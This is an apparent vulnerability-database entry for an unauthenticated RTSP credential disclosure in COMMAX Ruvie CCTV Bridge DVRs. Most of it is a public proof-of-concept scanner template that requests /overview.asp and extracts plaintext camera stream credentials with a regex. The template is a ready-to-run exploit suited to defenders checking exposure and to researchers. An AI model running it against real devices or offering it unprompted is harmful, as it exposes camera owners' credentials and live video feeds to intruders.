commax-credentials-disclosure: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure

Date: 2025-08-01 | Affected software: COMMAX Smart Home Ruvie CCTV Bridge DVR | PoC: public

Vulnerability description

The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose Real Time Streaming Protocol (RTSP) credentials in plaintext.

PoC code [public]

id: commax-credentials-disclosure

info:
  name: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure
  author: gy741
  severity: critical
  description: |
    The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
  metadata:
    max-request: 1
  tags: commax,exposure,camera,iot,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/overview.asp"

    matchers:
      - type: word
        part: body
        words:
          - "DVR Lists"
          - "rtsp://"
          - "login_check.js"
          - "MAX USER :"
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/Streaming\/Chann'
# digest: 490a0046304402205c27743db95bb12e7b7f09a5a8c9f79d8e628ee85dc50e69e96552e3c52f1d0e0220317262681c1fd76379bc2f5697520cc72598101fbac4bcd61a2c75a39b05aa2c:922c64590222798bb761d5b6d8e72950
